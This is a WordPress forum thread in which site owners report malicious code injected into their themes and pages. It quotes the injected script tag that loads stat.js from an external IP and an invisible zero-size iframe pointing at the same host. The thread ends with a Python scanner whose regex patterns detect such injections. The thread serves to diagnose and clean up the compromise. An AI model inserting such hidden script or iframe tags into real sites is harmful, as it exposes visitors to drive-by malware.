Thread Starter
cwary
(@cwary)
I’ve just figured out that code there is on all of my pages and the ASCII numbers point to this
<script type="text/javascript" src="http://84.244.138.55/stats/stat.js"></script>
I just put up my site, but it looks like it’s already been hacked somehow? I don’t see any plugins this could be connected to. Any tips on how to get rid of this code without having to reinstall all of WordPress?
I just ran into this code on my site as well. The code was inserted into a menu.js file inside my WordPress theme. I have no idea how it got there!
Have you installed any new plugins recently?
Thread Starter
cwary
(@cwary)
I ended up reinstalling WordPress and that worked…for a little. It mysteriously showed up again today, and I can’t figure out why or how.
Here are the plugins I’m running:
FeedSmith
Global Translator
Google XML Sitemaps
Headspace 2
Privacy Policy
Robots Meta
SEO Friendly Images
SEO Slugs
Weather Widget.
I’m also using the Amazing Grace template.
Thread Starter
cwary
(@cwary)
Looking up the domain http://84.244.138.55 in WhoIs I got this information:
‘
inetnum: 84.244.138.0 – 84.244.138.127
netname: Serverboost-2
descr: IP Space provided by We Dare
country: NL
admin-c: Sr4706-RIPE
tech-c: Sr4706-RIPE
status: ASSIGNED PA
mnt-by: WEDARE-MNT
source: RIPE # Filtered
role: Serverboost role
address: Vlaardingerdijk 430
address: 3117 ZW Schiedam
address: The Netherlands
phone: +31 (0)6 1482 4915
abuse-mailbox:
admin-c: JM6599-RIPE
tech-c: JM6599-RIPE
nic-hdl: Sr4706-RIPE
mnt-by: MNT-I3D
source: RIPE # Filtered
route: 84.244.128.0/18
descr: Route to first IP-numberblock We Dare BV
origin: AS20495
mnt-by: WEDARE-MNT
source: RIPE # Filtered
route: 84.244.128.0/19
descr: We Dare B.V.
origin: AS20495
mnt-by: WEDARE-MNT
source: RIPE # Filtered’
The resolve host is web.xxxgallz.com.
I’m really at a loss for what’s going on here. Google Analytics has me getting a visit from the Netherlands today, so that could be it, but I don’t know why this would have happened twice to my blog when I’ve just posted and have a hot 10 people coming to it per day.
This is a VIRUS. Your site has been hacked. Delete this immediately.
Basically, if you decode the numbers, it goes to another site and executes a downloaded script in an iframe so it’s not visible.
Within a few days, Google will notice your site as having malware and will block searches.
Does anyone have any idea on how this is installed? I’ve heard of it going into both WordPress and Joomla.
This malware also seems to be affecting my site – http://www.dpadmagazine.com – but having looked through all of the files and pages, I can’t find any inserted code.
A gap has also appeared at the top of the page when viewed in Firefox 3 on Windows and some Footer code has disappeared. I’m presuming it’s a hack, but having not been able to find this code I’ve no idea on how to fix it.
Anyone able to help?
When you’ve been looking at the code, have you been looking at the source online or in your local files?
We’ve had problems a few times with code from xxxgallz being put into our site (most recent was this morning). The code usually gets put in the bottom of our JavaScript files, though the most recent was put in at the bottom of the actual homepage with script tags.
Does anyone know how they could keep getting in? Our hosts tell us there are no security problems with their servers and it could be something we have installed and could be because of our WordPress. Maybe we don’t have permissions set correctly and these people are exploiting that?
It always seems to be some kind of tracking or analytics script, but I don’t know what benefit a Dutch porn site would get from having information about our visitors?
We checked the online files. We still couldn’t find the code but someone looking into it spotted the following invisible iframe. I’ve removed the http below just in case but it was 84.244.138.55.
<iframe height="0%" frameborder="0" width="0%" scrolling="auto" noresize="" marginwidth="0" marginheight="0" src="http:/ts/in.cgi?sltest"/>
We did however find a random cache.php file on the server which we deleted, which also removed the random gap at the top of the page. After resubmitting the site for review, it passed, only to then fail almost immediately. The cache.php hasn’t reappeared, and we’re completely stumped as to how to progress…
Hi,
This is a prevalent hack for the last couple of weeks. I’ve just blogged about it. (I’m posting the link in hope it will help resolve the issue)
http://blog.unmaskparasites.com/2009/04/02/malicious-stats-from-84-244-138-0/
I have a strong feeling this hack has to do with compromised passwords.
Scan your computer for spyware and then change all site passwords.
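The three things posters in this thread found (a script tag loading from a bare IP address, a zero-size iframe, and a run of character codes that decodes to markup) can be searched for in theme and page files. This is an added example, not code from any poster; the sample file content and the 192.0.2.55 documentation address are constructed, and the function names are hypothetical.

```python
import re

# <script>/<iframe> whose src host is a bare IPv4 address rather than a name
IP_SRC = re.compile(
    r'<(?:script|iframe)\b[^>]*\bsrc\s*=\s*["\']?https?://(\d{1,3}(?:\.\d{1,3}){3})', re.I)
# iframe with a zero width or height, i.e. invisible to the visitor
HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0(?:%|px)?["\'\s/>]', re.I)
# run of ten or more comma-separated decimal character codes
CHARCODES = re.compile(r'(?:\d{2,3}\s*,\s*){9,}\d{2,3}')

def decode_charcodes(run):
    """Turn '60,115,99,...' into text; nothing is executed or fetched."""
    codes = [int(n) for n in re.split(r'\s*,\s*', run)]
    return ''.join(chr(c) if 32 <= c < 127 else '?' for c in codes)

def scan(text):
    """Return (line_number, kind, detail) for each indicator found."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        decoded = [decode_charcodes(m.group(0)) for m in CHARCODES.finditer(line)]
        findings += [(no, 'charcodes', d) for d in decoded]
        haystack = ' '.join([line] + decoded)   # inspect decoded text too
        findings += [(no, 'ip-src', m.group(1)) for m in IP_SRC.finditer(haystack)]
        if HIDDEN_IFRAME.search(haystack):
            findings.append((no, 'hidden-iframe', ''))
    return findings

def _codes(s):
    return ','.join(str(ord(c)) for c in s)

# Constructed sample: a theme .js file with code appended at the bottom.
SAMPLE = (
    'function menu() { return true; }\n'
    'document.write(String.fromCharCode('
    + _codes('<script src="http://192.0.2.55/stats/stat.js"></script>') + '));\n'
    '<iframe height="0%" frameborder="0" width="0%" src="http://192.0.2.55/in.cgi"></iframe>\n'
)

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(finding)
```

Run `scan()` over a local copy of every `.js`, `.php` and `.html` file in the site, and compare any hit against a clean copy of the theme or plugin before deleting it.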